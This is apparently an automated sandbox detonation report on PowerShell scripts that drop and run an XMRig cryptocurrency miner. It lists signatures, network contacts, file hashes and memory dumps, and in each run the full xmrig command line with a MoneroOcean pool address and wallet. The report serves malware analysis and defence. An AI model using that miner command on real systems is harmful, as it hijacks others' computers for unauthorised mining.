N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp

Files

memory/4496-3-0x00007FFBCC3E3000-0x00007FFBCC3E4000-memory.dmp

memory/4496-6-0x0000011EC5C10000-0x0000011EC5C32000-memory.dmp

memory/4496-5-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/4496-10-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/4496-9-0x0000011EC5ED0000-0x0000011EC5F46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybtlsrzt.cnc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4496-26-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/4496-49-0x0000011EC5F50000-0x0000011EC5F62000-memory.dmp

memory/4496-62-0x0000011EC5CA0000-0x0000011EC5CAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1824-91-0x000002BE8F030000-0x000002BE8F050000-memory.dmp

memory/1824-92-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-93-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/4496-94-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/4496-95-0x00007FFBCC3E3000-0x00007FFBCC3E4000-memory.dmp

memory/4496-96-0x00007FFBCC3E0000-0x00007FFBCCDCC000-memory.dmp

memory/1824-97-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-98-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-99-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-100-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-101-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-102-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-103-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-104-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-105-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-106-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-107-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-108-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-109-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-110-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-111-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-112-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-113-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-114-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-115-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-116-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-117-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-118-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-119-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-120-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-121-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-122-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-123-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-124-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-125-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-126-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-127-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-128-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-129-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-130-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-131-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-132-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-133-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-134-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-135-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-136-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-137-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-138-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-139-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-140-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-141-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-142-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-143-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-144-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-145-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-146-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-147-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-148-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-149-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-150-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-151-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-152-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-153-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-154-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-155-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-156-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

memory/1824-157-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:23

Platform

win10v2004-20240426-en

Max time kernel

1797s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 147.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp

Files

memory/1496-0-0x00007FFB22803000-0x00007FFB22805000-memory.dmp

memory/1496-1-0x0000019233510000-0x0000019233532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sytnh33q.akj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1496-11-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

memory/1496-12-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

memory/1496-14-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

memory/1496-15-0x000001924C760000-0x000001924C772000-memory.dmp

memory/1496-16-0x000001924C400000-0x000001924C40A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1680-47-0x000001F1DE8E0000-0x000001F1DE900000-memory.dmp

memory/1680-48-0x000001F1DE920000-0x000001F1DE940000-memory.dmp

memory/1680-49-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-51-0x000001F1DE960000-0x000001F1DE980000-memory.dmp

memory/1680-50-0x000001F1DE940000-0x000001F1DE960000-memory.dmp

memory/1680-52-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1496-53-0x00007FFB22803000-0x00007FFB22805000-memory.dmp

memory/1496-54-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

memory/1496-56-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp

memory/1680-55-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-59-0x000001F1DE960000-0x000001F1DE980000-memory.dmp

memory/1680-58-0x000001F1DE940000-0x000001F1DE960000-memory.dmp

memory/1680-57-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-60-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-61-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-62-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-63-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-64-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-65-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-66-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-67-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-68-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-69-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-70-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-71-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-72-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-73-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-74-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-75-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-76-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-77-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-78-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-79-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-80-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-81-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-82-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-83-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-84-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-85-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-86-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-87-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-88-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-89-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-90-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-91-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-92-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-93-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-94-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-95-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-96-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-97-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-98-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-99-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-100-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-101-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-102-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-103-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-104-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-105-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-106-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-107-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-108-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-109-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-110-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-111-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-112-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-113-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-114-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-115-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-116-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-117-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

memory/1680-118-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:35

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4988-2-0x00007FF8F2423000-0x00007FF8F2424000-memory.dmp

memory/4988-5-0x000001F9705C0000-0x000001F9705E2000-memory.dmp

memory/4988-8-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp

memory/4988-9-0x000001F970BE0000-0x000001F970C56000-memory.dmp

memory/4988-10-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v3dwu0dw.hlq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4988-25-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp

memory/4988-48-0x000001F970C60000-0x000001F970C72000-memory.dmp

memory/4988-61-0x000001F970A40000-0x000001F970A4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1576-90-0x00000220020C0000-0x00000220020E0000-memory.dmp

memory/1576-91-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/4988-92-0x00007FF8F2423000-0x00007FF8F2424000-memory.dmp

memory/4988-93-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp

memory/1576-94-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-95-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-96-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-97-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-98-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-99-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-100-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-101-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-102-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-103-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-104-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-105-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-106-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-107-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-108-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-109-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-110-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-111-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-112-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

memory/1576-113-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp

